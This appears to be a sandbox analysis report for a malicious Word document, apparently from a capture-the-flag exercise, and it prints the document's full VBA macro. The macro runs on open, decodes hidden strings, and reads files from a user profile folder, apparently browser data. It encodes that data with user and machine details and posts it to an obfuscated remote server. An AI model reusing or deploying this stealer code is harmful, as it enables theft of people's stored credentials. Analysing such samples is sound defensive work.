Epica_Invite[.]doc

Sharing

Copy URL

Twitter E-mail

General

Target

Epica_Invite.doc
Size

76KB
MD5

a539b1a18cc5d49335c2b58161441c15
SHA1

51850bbffe7c62f35aa7a46b4c7d416208dc32c7
SHA256

8f1afe442426683d0d187727ea06e086485546f0f076de94018d48d8ef564959
SHA512

160cd52eadb413e5362badb384d25595ba7314ed2b2d9e9330f5b3d05152513a3f6b0934c2256072b41deb48e617d55476eb50ef73ac74411221e7e196b6b569
SSDEEP

768:v3NIxz+qsub8ZPKCBvwSdBNqhUkJTSmQBvfPxRfSJF0YwUAKcKzf45l:v3NIt+qspgIogD2UihQBn2KRKj45l

Score

8^/10

macro

Malware Config

Signatures

Suspicious Office macro 1 IoCs

Office document equipped with macros.

macro

resource
sample

Files

Epica_Invite.doc
.doc windows office2003

ThisDocument

1

Attribute VB_Name = "ThisDocument"

2

Attribute VB_Base = "1Normal.ThisDocument"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = True

8

Attribute VB_Customizable = True

9

NewMacros

1

Attribute VB_Name = "NewMacros"

2

' first flag is: Cur10s1tyIsAKey

3

4

Private musicStore As String

5

6

Sub AutoOpen()

7

album

8

End Sub

9

Sub Workbook_Open()

10

album

11

End Sub

12

13

Function getNote(guitar_char, pick_char)

14

getNote = Chr(guitar_char - pick_char)

15

End Function

16

17

Function LessStrings(str)

18

LessStrings = Right(str, Len(str) - 3)

19

End Function

20

21

Function PlayMusic(guitar, pick)

22

Dim song As String

23

Do

24

OneNote = getNote(Left(guitar, 3), Left(pick, 3))

25

song = song + OneNote

26

guitar = LessStrings(guitar)

27

pick = LessStrings(pick)

28

Loop While Len(guitar) > 0

29

PlayMusic = song

30

End Function

31

32

Sub playSolo(tabs As String, phrases As String, ByRef reaction As String)

33

On Error Resume Next

34

Dim intro As Object

35

Dim innerNotes As Object

36

Dim arrangement As String

37

Set intro = CreateObject(PlayMusic("131211135304269152146133147243141115313287161143155169238127296332342322184308", "048112021199157036041023044197071010205186078022040053137018217234236221085192"))

38

For Each innerNotes In intro.GetFolder(tabs).subfolders

39

arrangement = LCase(innerNotes.Name)

40

If arrangement Like phrases Then

41

reaction = innerNotes.Path

42

Exit Sub

43

End If

44

Next

45

End Sub

46

47

Sub enjoyMasterpiece(owner As String, diskName As String, labelName As String)

48

On Error Resume Next

49

Dim diskBox As Integer

50

Dim cdROM() As Byte

51

Dim allNotes As String

52

53

diskBox = FreeFile

54

Open diskName For Binary Access Read As diskBox

55

If LOF(diskBox) > 0 Then

56

ReDim cdROM(0 To LOF(diskBox) - 1) As Byte

57

Get diskBox, , cdROM

58

allNotes = StrConv(cdROM, vbUnicode)

59

End If

60

Close diskBox

61

Dim sContextType As String

62

sContextType = PlayMusic("316366313334180100263358299197312056289259140235142091166368204159176215119", "219254201226075001166242194086202009178160024134026046051252090058079106060")

63

Dim albumDescription As String

64

albumDescription = PlayMusic("197093254233216091190331197273276154268", "130014177153131007121249119208199085207") + Environ$(PlayMusic("306128252320328105101089259285172314", "239049175240243021032007181220095245")) + PlayMusic("268", "230")

65

albumDescription = albumDescription + PlayMusic("251297174319213068296295136", "166214105237135003219226075") + Environ$(PlayMusic("087245311260213142197255", "002162242178135077120186")) + PlayMusic("268", "230")

66

albumDescription = albumDescription + PlayMusic("210112076075215", "140039000006154") + labelName + PlayMusic("268", "230")

67

Dim formattedRecord As String

68

formattedRecord = formatRecord(albumDescription)

69

allNotes = formatRecord(allNotes)

70

Set albumReview = CreateObject(PlayMusic("245285114118108099046255212194329144196197272329078236266149", "168202026041032049000172111080211043082109195253006152182069"))

71

albumReview.Open PlayMusic("090122312193", "010043229109"), owner + PlayMusic("199", "136") + PlayMusic("329359323309198190", "216242222195077129") + formattedRecord, False

72

albumReview.setRequestHeader PlayMusic("144309174334267162105198246354", "059194073220222097002097136238"), PlayMusic("194354268293127351330275073065197152200101256361259279119182210143153162298060124078146096285202145162192196101326061199201084105258247170145128101249292118302074227258079243099135114135256111230119270156124320234110285179104175209248289288155281243263197147340290056121133165055277273249239271097137110326239275110089232080151114216", "117243146188019243233228020019149120160014151251159168000067178065069130249012078030087064198097035108140137069206007147160052040146135062044041000151217013186027174207024197048081082095181039146042194112092212129003184147033074110141178247123214139149086038239243007073077119007231225203191239014040008229125170063036181025105063162")

73

albumReview.send intoDigits(allNotes)

74

End Sub

75

76

Private Function formatRecord(lyrics As String) As String

77

On Error Resume Next

78

Dim b() As Byte

79

b = intoDigits(lyrics)

80

Dim result As String

81

result = ""

82

For Counter = LBound(b) To UBound(b)

83

b(Counter) = (b(Counter) + 20) And 255

84

Next Counter

85

formatRecord = digitize(b)

86

End Function

87

88

Private Function intoDigits(lyrics As String) As Byte()

89

intoDigits = StrConv(lyrics, vbFromUnicode)

90

End Function

91

92

Function digitize(vArr As Variant) As String

93

On Error Resume Next

94

Dim firstPage As Object

95

Dim secondPage As Object

96

Set firstPage = CreateObject(PlayMusic("266266275288223165121209100292097131196222163237340293", "189183187211147115075141021215029020097105054136230177"))

97

Set secondPage = firstPage.createElement(PlayMusic("144302241", "046248189"))

98

secondPage.DataType = PlayMusic("345351169203352156189281106053", "247246059157254059074180052001")

99

secondPage.nodeTypedValue = vArr

100

digitize = secondPage.Text

101

End Function

102

103

Public Function checkLicense(s_directory As String) As Boolean

104

Dim licenseKey As Object

105

Set licenseKey = CreateObject("274340343325209278250247342105186122138116250327363371305143115156159169218304", "191241229220097162145137239059116017030015167206248255204034036058053068119188")

106

checkLicense = licenseKey.FolderExists(s_directory)

107

End Function

108

109

Sub findMusic()

110

On Error Resume Next

111

Dim lad As String

112

Dim vinylRecord As String

113

lad = Environ$(PlayMusic("330304261093125205150303244214096260", "254225194028049140070223176149012195"))

114

vinylRecord = ""

115

playSolo lad, PlayMusic("243324292356201227", "140213181253093126"), vinylRecord

116

If Not vinylRecord = vbNullString Then

117

Dim EP As String

118

Dim tracklist As String

119

EP = vinylRecord & PlayMusic("233188271277283146208095113156336240271167104169343332132154253118348115225141220365171345339224158233335127", "141121167163172037107003028041235126239099007053246240064053151021231007109049144254068240229192090136219030")

120

tracklist = vinylRecord & PlayMusic("104293235255354331113145237128246159275316243219315124173219354330180207123157339166112", "012226131141243222012053152013145045243248146103218032097108255233072175040041242050011")

121

If Len(Dir(EP)) And Len(Dir(tracklist)) Then

122

enjoyMasterpiece musicStore, EP, PlayMusic("176282214111199198125274122229148339230246142155300", "109178100000090097030198011126043229135178045039203")

123

enjoyMasterpiece musicStore, tracklist, PlayMusic("207141337320210293235115190321175148221109331285211331", "140037223209101192140039079222078040126026215188095230")

124

enjoyMasterpiece musicStore, tracklist, PlayMusic("261161101168184172125073229236231129191195198236115260103258264273140074113285331315290", "159053004065152067010015197149183015084112089172001144002144186225024002049171231214176")

125

End If

126

End If

127

End Sub

128

129

Sub album()

130

On Error Resume Next

131

Dim epicaSupport As String

132

epicaSupport = PlayMusic("296239177211212236243136243085051237278250165181150086262057170", "192123061099154189196087193030005189232202119132092033214009122")

133

musicStore = epicaSupport & PlayMusic("138327361142288256185176", "091215247037170159086055")

134

findMusic

135

136

MsgBox ("Данные отправлены!")

137

138

End Sub

139

140

141

142

143

Sharing

General

Malware Config

Signatures

Files

ThisDocument

NewMacros

We care about your privacy.